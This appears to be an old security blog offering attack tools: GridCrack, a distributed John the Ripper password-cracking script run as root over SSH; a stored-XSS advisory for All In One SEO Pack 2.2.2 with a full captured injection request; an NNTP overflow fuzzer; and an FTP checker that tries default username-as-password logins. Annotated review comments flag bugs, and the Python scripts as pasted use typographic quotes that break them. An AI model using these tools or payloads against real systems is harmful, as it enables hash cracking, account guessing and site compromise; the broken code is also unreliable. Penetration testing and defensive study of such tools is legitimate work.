Friday, August 22, 2014

GridCrack - A Grid Based Password Cracker

#!/bin/bash
# GRIDCRACK v20140822 by 1N3 @ http://xerosecurity.com
#
# USAGE: ./gridcrack <crack/status/setup> <format>
#
# ABOUT:
# GRIDCRACK is a Linux grid based password cracker used to leverage multiple servers to crack a single hash file.
#
# REQUIREMENTS:
# 1) Two or more Linux based servers running John The Ripper (john)
# 2) root SSH keys setup for automatic login/authentication via SSH keys
# 3) A large masterlist dictionary file to split amongst the configured nodes
#
# HOW IT WORKS:
# Running ./gridcrack setup will launch the initial setup of gridcrack which will prompt for the masterlist.dic file (a large wordlist of your choice..).
# From there, it will proceed to split the file into equal parts based on the number of configured nodes in this script (NUM_NODES). Next, it will transfer
# the individual parts of the split wordlist to each host via SCP. From here, the user can copy/paste their hashes into the hashes.txt (/pentest/gridcrack/hashes.txt)
# and run the appropriate command to begin the brute force attack (ie. ./gridcrack crack NT). From here, gridcrack will first copy the hashes.txt to each node first,
# then proceed to run john on each node simultaneously using the format specified (ie. NT). Results are then displayed back to the central server as
# each node finishes. A status mode is also included to show the status of john on each node (ie. ./gridcrack status NT).
#
#

# STATIC VARS
# Deployment settings -- fill these in before running gridcrack.
# NUM_NODES      : number of configured nodes; setup mode divides the master
#                  wordlist line count by this value.
# NODE1..NODE3   : hostname/IP of each node; an empty value means that node is
#                  skipped. Every remote step runs as root over SSH.
# GRIDCRACK_HOME : working directory, used as the same path both locally and
#                  on every node.
NUM_NODES=
NODE1=
NODE2=
NODE3=
GRIDCRACK_HOME=

# CRACK MODE
# Copies the local hashes.txt to every configured node, then launches john on
# each node in the background against that node's slice of the wordlist
# (xaa/xab/xac, produced by setup mode) and prints the --show output here
# when a node finishes.
# NOTE(review): every remote command runs as root, and nothing in this script
# removes hashes.txt or the cracked results from the nodes afterwards -- the
# hash material stays on each node unless cleaned up by hand.
if [ "$1" == "crack" ]
then
    if [ -z "$2" ]
    then
        echo "Format not set. Use ./gridcrack crack <format> to set it..."
        exit 1
    else
        FORMAT="$2"
        # TRANSFER HASHES TO EACH NODE
        # A node is skipped when its NODEn variable is empty.
        # NOTE(review): stderr is discarded and the scp status is not checked,
        # so a failed copy is silent and the crack step below runs against
        # whatever file (if any) is already on the node. The expansions are
        # unquoted: with GRIDCRACK_HOME empty the source path becomes
        # "/hashes.txt".
        echo "Transferring hashes to each node..."
        if [ "$NODE1" ]
        then
            scp $GRIDCRACK_HOME/hashes.txt root@$NODE1:$GRIDCRACK_HOME 2> /dev/null
        fi

        if [ "$NODE2" ]
        then
            scp $GRIDCRACK_HOME/hashes.txt root@$NODE2:$GRIDCRACK_HOME 2> /dev/null
        fi

        if [ "$NODE3" ]
        then
            scp $GRIDCRACK_HOME/hashes.txt root@$NODE3:$GRIDCRACK_HOME 2> /dev/null
        fi

        # START CRACKING ON EACH NODE
        # Each line is one backgrounded chain: the wordlist run, then (only if
        # it exits 0) a --show pass whose output is what the operator sees.
        # The script itself returns to the prompt immediately; results arrive
        # asynchronously and a non-zero exit of the first john run produces no
        # output at all because its stderr is discarded.
        # NOTE(review): NODE1 is invoked with "-format=" while NODE2/NODE3 use
        # "--format=" (status mode below has the same split); use one spelling
        # on every node.
        echo "Starting crack mode on each node..."
        if [ "$NODE1" ]
        then
            ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xaa -format=$FORMAT 2> /dev/null && ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show &
        fi

        if [ "$NODE2" ]
        then
            ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xab --format=$FORMAT 2> /dev/null && ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &   
        fi

        if [ "$NODE3" ]
        then
            ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xac --format=$FORMAT 2> /dev/null && ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &   
        fi
    fi

# SHOW STATUS
# For each configured node: list remote john processes working on the hashes
# file, then print what john has recorded as cracked so far.
elif [ "$1" == "status" ]
then
    if [ -z "$2" ]
    then
        echo "Format not set. Use ./gridcrack status <format> to set it..."
        exit 1
    else
        FORMAT="$2"
        echo "Checking status..."
        if [ "$NODE1" ]
        then
            echo "#### NODE1:"
            # The two greps run locally on the remote ps output, so a node with
            # no matching process simply prints nothing for this line.
            ssh root@$NODE1 ps -ef | grep john | grep hashes
            ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show
        fi

        if [ "$NODE2" ]
        then
            echo "#### NODE2:"
            ssh root@$NODE2 ps -ef | grep john | grep hashes
            ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
        fi
        if [ "$NODE3" ]
        then
            echo "#### NODE3:"
            ssh root@$NODE3 ps -ef | grep john | grep hashes
            ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
        fi
    fi

# RUN SETUP
# Splits the operator-supplied master wordlist into NUM_NODES chunks inside
# $GRIDCRACK_HOME/wordlists/ and ships one chunk to each node.
elif [ "$1" == "setup" ]
then
    echo "################"
    echo "Running setup..."
    echo "################"
    echo ""
    echo "Enter full name and path to masterlist.dic...(ie. /pentest/gridcrack/wordlists/masterlist.dic)"
    # NOTE(review): read without -r interprets backslashes, and the path is
    # used unquoted below with no existence check: for a missing file the
    # wc/awk pipeline yields an empty count and the expr on the next line
    # fails.
    read MASTERLIST
    MASTERLIST_LINES=`wc -l $MASTERLIST | awk '{print $1}'`
    # Integer division: any remainder lines end up in an extra chunk (xad...)
    # that is never transferred to a node. With NUM_NODES left at its empty
    # default this expr fails outright.
    MASTERLIST_LINES=`expr $MASTERLIST_LINES / $NUM_NODES`
    # NOTE(review): the cd is unchecked; if it fails, split writes its chunks
    # into the current directory and the scp lines below find nothing.
    cd $GRIDCRACK_HOME/wordlists/
    echo "Splitting wordlists... this could take a few minutes..."
    # split's default names (xaa, xab, xac, ...) are what the per-node copies
    # below rely on; chunks left over from an earlier run are not cleared.
    split -l $MASTERLIST_LINES $MASTERLIST
    ls -lh $GRIDCRACK_HOME/wordlists/
    if [ "$NODE1" ]
    then
        echo "Creating directory structure on $NODE1..."
        ssh root@$NODE1 mkdir $GRIDCRACK_HOME/wordlists/ -p
        scp $GRIDCRACK_HOME/wordlists/xaa root@$NODE1:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
    fi

    # NOTE(review): NODE2 and NODE3 get the same mkdir/scp treatment as NODE1
    # but without the progress message; as with crack mode, scp errors are
    # discarded and unchecked.
    if [ "$NODE2" ]
    then
        ssh root@$NODE2 mkdir $GRIDCRACK_HOME/wordlists/ -p
        scp $GRIDCRACK_HOME/wordlists/xab root@$NODE2:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
    fi
    if [ "$NODE3" ]
    then
        ssh root@$NODE3 mkdir $GRIDCRACK_HOME/wordlists/ -p
        scp $GRIDCRACK_HOME/wordlists/xac root@$NODE3:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
    fi

# SHOW HELP SCREEN
# -h and the fallback branch print the same text. Note the usage line names
# "./gridcrack.sh" while the file header documents "./gridcrack".
elif [ "$1" == "-h" ]
then
    echo "************* GRIDCRACK by 1N3 ********************"
    echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
    echo "************* http://xerosecurity.com *************"
else
    echo "************* GRIDCRACK by 1N3 ********************"
    echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
    echo "************* http://xerosecurity.com *************"
fi


Wednesday, August 13, 2014

All In One SEO Pack v.2.2.2 Stored XSS



Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2

ABOUT:

All in One SEO Pack is a WordPress SEO plugin that automatically optimizes a WordPress blog for search engines such as Google. Version 2.2.2 suffers from a stored cross-site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. A malicious author or admin of a site could use this flaw to secretly redirect users of the site to a malicious site or to steal the session cookies of other users.


NOTE: The user must have the ability to publish pages in the affected WordPress site (usually the Author or Admin role is required).

POC:
http://localhost/wordpress/wp-admin/post.php?post_type=page

Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1
Content-Type=application/x-www-form-urlencoded
Content-Length=1856

POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E

Tuesday, August 12, 2014

Network News Transfer Protocol (NNTP) Fuzzer


#!/usr/bin/python
# Network News Transfer Protocol Fuzzer by 1N3 v20140802
# http://xerosecurity.com
#
# USAGE: NTTP_fuzz.py <IP/host> <port>
#
#HELP
#100 Supported Commands
#   MODE READER
#   AUTHINFO USER <username>
#   AUTHINFO PASS <password>
#   LIST <active|newsgroups|overview.fmt> <pattern>
#   XGTITLE <pattern>
#   GROUP <newsgroup>
#   LISTGROUP <newsgroup>
#   NEWGROUPS <yy><yymmdd> <hhmmss>
#   OVER <range|msgid>
#   XOVER <range|msgid>
#   XHDR <header> <range|msgid>
#   XPAT <header> <range|msgid> <pattern> <pattern..>
#   NEWNEWS <newsgroup> <yymmdd> <hhmmss> <gmt|utc>
#   STAT <msgid|number>
#   HEAD <msgid|number>
#   BODY <msgid|number>
#   ARTICLE <msgid|number>
#   POST
#   NEXT
#   LAST
#   HELP
#   DATE
#   QUIT
import socket
import time
import sys, getopt
def main(argv):
    # Connects to the NNTP port of argv[1] repeatedly, each time sending
    # AUTHINFO USER and AUTHINFO PASS with a payload of "X" characters that
    # grows by 100 per round, and prints the server's reply to the PASS step.
    # NOTE(review): the file header advertises a <port> argument, but argv[2]
    # is never read -- the port is hard-coded to 119 below.
    # NOTE(review): the string literals use typographic quotes (a copy/paste
    # artifact) and the print statements are Python 2 syntax; as pasted this
    # does not parse under Python 3.
    argc = len(argv)
    if argc <= 1:
        # Usage error, yet the exit status is 0.
        print “usage: %s <host>” % (argv[0])
        sys.exit(0)
    # This socket is never used or closed; the loop opens a fresh one per round.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # CREATE SOCKET
    buffer = ["X"] # BUFFER “X” (a one-element list; replaced by a string below)
    counter = 100 # START VALUE
    target = argv[1] # SET TARGET
    port = “119″ # SET PORT
    # Runs until the payload exceeds 10000 characters (the first check sees
    # the one-element list above, so the loop always runs at least once).
    while (len(buffer)) <= 10000: # END VALUE
        buffer=”X”*counter
        counter=counter+100 # STEP: each round is 100 characters longer
        print “(–==== Fuzzing ” + target + “:” + port + ” with length:” +str(len(buffer))
        # No error handling: a refused/reset connection raises and ends the run.
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect((target,int(port)))
        data = s.recv(1024)
        #print “CONNECTION: ” +data
        s.send(‘AUTHINFO USER ‘ + buffer + ‘\r\n’)
        data = s.recv(1024)
        #print “received: ” +data
        s.send(‘AUTHINFO PASS ‘ + buffer + ‘\r\n’)
        # Only the reply to PASS is shown; the banner and USER reply are dropped.
        data = s.recv(1024)
        print “received: ” +data
        s.close()
        #time.sleep(3)
# print “\n”.join(sys.argv)
main(sys.argv)

Anonymous FTP Login Checker


#!/usr/bin/python
# Anonymous FTP login checker by 1N3 v20140805
# http://xerosecurity.com
#
# ABOUT:
# This script checks the remote host for anonymous FTP accounts enabled.

import socket
import time
import sys, getopt
def main(argv):
    # For each name in `users`, opens a new FTP connection to argv[1] on port
    # 21, sends USER <name> / PASS <name> (the password is always the same as
    # the username) and prints the server's reply to PASS, then QUITs.
    # NOTE(review): despite the header, only the first entry is an anonymous
    # login; the rest are username-as-password checks for common accounts.
    # The reply is printed verbatim and not interpreted -- the operator reads
    # the response code. As pasted, the typographic quotes and Python 2 print
    # statements keep this from parsing under Python 3.
    argc = len(argv)
    if argc <= 1:
        # Usage error, yet the exit status is 0.
        print “usage: %s <host>” % (argv[0])
        sys.exit(0)
    print “(–==== Checking anonymous FTP login…\n”
    users=["anonymous","admin","ftp","administrator","guest"]
    target = argv[1] # SET TARGET
    for user in users:
        print “(–==== Checking user: ” +user
        # One connection per user; a refused connection raises and ends the run.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,21))
        data = s.recv(1024)
        s.send(‘USER ‘ +user+ ‘\r\n’)
        data = s.recv(1024)
        s.send(‘PASS ‘ +user+ ‘\r\n’)
        data = s.recv(1024)
        print data
        s.send(‘QUIT’ +’\r\n’)
        s.close()
main(sys.argv)